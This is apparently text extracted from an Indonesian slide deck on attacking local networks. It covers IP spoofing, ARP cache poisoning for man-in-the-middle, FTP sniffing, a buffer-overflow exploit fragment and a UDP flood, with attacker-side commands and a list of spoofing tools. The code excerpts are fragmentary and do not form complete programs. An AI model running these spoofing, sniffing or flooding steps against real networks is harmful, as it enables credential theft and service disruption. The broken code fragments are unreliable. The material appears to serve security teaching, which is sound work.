Attackingthelan 091013224332 Phpapp02
Attackingthelan 091013224332 Phpapp02
Local Network atau sering disebut Local Area Network (LAN) saat ini
sudah menjadi hal yang sangat lumrah di berbagai tempat misalnya di
lingkungan akademik seperti kampus, sekolah dasar dan menengah, dan
perkantoran. Namun pernahkan kita bayangkan bahwa dari jaringan lokal
inilah sebuah intrusi untuk mencuri informasi – informasi sensitif menjadi
sangat mudah (ingat tidak semua orang dalam bisa di percaya bahkan
sebagian besar intrusi lebih banyak terjadi dari jaringan lokal). Dari jaringan
lokal policy firewall, rule IDS biasanya di buat lebih sederhana sehingga
restriksinya pun tidak terlalu ketat. Hal inilah yang sering di manfaatkan oleh
seorang attacker untuk melakukan penyerangan dari dalam. Berikut ini trend
attack yang sering dilakukan dari jaringan lokal :
- Spoofing
- Sniffing
- Man in The Middle (MiTM)
- TCP/IP Session Hijacking
- Trojan
- Keylogging
- Remote Code Execution
- Denial of Service
Di sisi attacker
(1) ifconfig –a | grep “inet addr”
(2) tar zxvf ipspoof.tgz
(3) cd ipspoof/
(4) gcc –o ipspoof ipspoof.c
(5) ./ipspoof
(6) ./ipspoof <victim addr> <port> <source addr>
example :
(7) ./ipspoof 10.13.200.130 80 1.2.3.4
Di sisi victim
(1) ifconfig –a|grep “inet addr”
(2) tcpdump –nne tcp port 80
Satu hal yang menarik dari table entry ARP tadi adalah ketika 2 IP
address berbeda dengan MAC yang sama ada di dalam table ARP, maka IP
address yang terdahulu akan dioverwrite oleh IP address yang baru. Lalu
yang harus dilakukan oleh attacker adalah mengirimkan ARP sehingga
komputer User A percaya bahwa IP address komputer User B ada di MAC
address komputer attacker dan mengirimkan ARP sehingga komputer User B
percaya bahwa IP address komputer User A ada di MAC address komputer
attacker juga. Dengan teknik ini semua paket data dari komputer User A yang
menuju ke komputer User B akan melalui interface attacker. Teknik
pemalsuan ARP ini sering dikenal dengan ARP spoofing atau ARP cache
poisoning. Banyak sekali tools yang bisa digunakan untuk melakukan ARP
spoofing dan tersedia gratis di internet. Beberapa yang sering digunakan
adalah :
- ettercap ( http://ettercap.sourceforge.net/ )
- arpspoof ( bagian dari dsniff http://monkey.org/~dugsong/dsniff/ )
- nemesis ( http://nemesis.sourceforge.net )
- Cain & Abel ( http://www.oxid.it )
Di sisi attacker
(1) support kernel IP forwarding sysctl net.ipv4.ip_forward=1
(2) lakukan Man in The Middle
Lihat di pembahasan sebelumnya
(3) lakukan sniffing
tcpdump –nne tcp port 21 (sniffing koneksi ftp)
- Buffer Overflow
- Integer Overflow
- Error Format String
- SQL injection
- File Inclussion
- Cross Site Scripting (XSS)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(LISTENPORT);
my_addr.sin_addr.s_addr = htonl(INADDR_ANY);
if (listen(sock,BACKLOG) == -1) {
perror("listen");
exit(1);
}
while(1) {
conn = accept(sock, (struct sockaddr *)&client_addr, &sa_in_size);
if (conn == -1) {
perror("accept");
exit(1);
}
}
return 0;
}
$eip="\x18\xe3\xff\xbf";
$attackstring = $nopsled.$payload.$eip;
#view a message if no ip address is given
if(!$ip)
{
die "You have to provide the target's IP Address..\n";
}
Di sisi attacker
gcc –o udpflood udpflood.c
./udpflood -s 800 -f 10 10.13.8.87